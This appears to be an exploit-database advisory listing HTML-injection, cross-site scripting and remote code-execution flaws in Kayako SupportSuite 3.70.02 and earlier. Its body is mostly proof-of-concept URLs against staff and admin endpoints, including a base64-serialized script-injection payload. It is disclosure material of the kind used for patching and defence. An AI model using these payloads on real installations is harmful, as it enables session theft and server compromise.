Kayako SupportSuite 3.x - Multiple Vulnerabilities

Author: Yuri Goltsev
type: webapps
platform: php
port: 
date_added: 2012-01-11 
date_updated: 2015-03-30 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/51377/info

Kayako SupportSuite is prone to the following vulnerabilities:

1. Multiple HTML-injection vulnerabilities.
2. A remote code-execution vulnerability.
3. Multiple cross-site scripting vulnerabilities.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable.

Remote code-execution:
http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register

Cross-site scripting:
http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9

http://www.example.com/support/staff/index.php?_m=news&_a=managenews

http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories

http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles

http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]

http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking

http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses

http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts

http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters